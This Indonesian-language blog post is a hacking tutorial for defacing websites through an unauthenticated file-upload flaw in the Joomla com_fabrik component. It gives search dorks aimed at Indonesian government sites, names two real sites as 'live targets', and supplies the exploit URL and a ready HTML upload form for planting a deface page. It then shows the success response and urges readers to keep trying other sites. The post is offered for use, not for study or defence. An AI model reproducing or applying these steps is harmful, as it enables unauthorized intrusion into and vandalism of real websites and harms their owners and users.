Deface poc com fabrik with CSRF

Hasil gambar untuk gambar anime hacker



Hi bertemu lagi dengan saya
kali ini saya akan memberikan tutorial bagaimana men deface atau mengubah tampilan
sebuah website dengan metode com fabrik with csrf
Sengaja tidak memakai shell
krna lebih baik menitip saja :v
ok sebelumny saya memberi tutorial bgaimana deface web dengan bypass
upload shell tebas index
simak saja


=============
 DORK
=============
inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:go.id
inurl:index.php?option=com_fabrik&view= site:go.id
inurl:importcsv.php site:go.id
(Di kembangin ajah )

==============
ALAT & BAHAN
==============

Csrf Com_Fabrik KLIK copy ke note pad dan simpan dengan nama csrf.html
Script Deface HTML sendiri
Bisa di ambil dari Sini
Exploit /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

======================================
LIVE TARGET : - www.zambianacmisonline.org 
                               - http://pn-maros.go.id
======================================

Toturial

./Nocturnal-start
1) Dorking Seperti Biasa cari site yang kira kira vuln
2) Kalau dah dapet masukan exploit nya contoh
"http://pn-maros.go.id/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"
Kalau Vuln muncul tulisan seperti ini

[Image: f5e97-screenshot2bfrom2b2018-02-192b16-47-25.png?w=300]

3) Selanjut nya kita edit script csrf nya untuk mengupload file deface nya
Edit Yang Bagian yang tebal dan di coret saja
edit dengan nama web yang hendak di eksekusi
=========================================================================
<form method="POST" action="http://www.namaweb.co.li/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data">
<input type="file" name="file"><button>Gas kenn</button>
</form>
<Font Color="green" Face="courier new"><font size="8">CSRF By: ~/Mr.RX11Z</h1><br><br>
=========================================================================

Kalau Udah di edit jangan lupa save ya :v

4) Selanjut nya buka csrf nya
    upload script klian

5)  kalau berhasil akan muncul tulisan
{"filepath":"null","uri":"http:\/\/pn-maros.go.id\/.namafile.html"}
Kalau udah berhasil UP script kalian tinggal buka aja

http://namasite.co.li/namafile.html atau htm

kalau gak ke deface ya cari web lagi jangan putus asa

Jangan lupa like,kunjungi dan share ya

Kalau belum paham
bisa chat saya di

 Contact fb

Komentar

Posting Komentar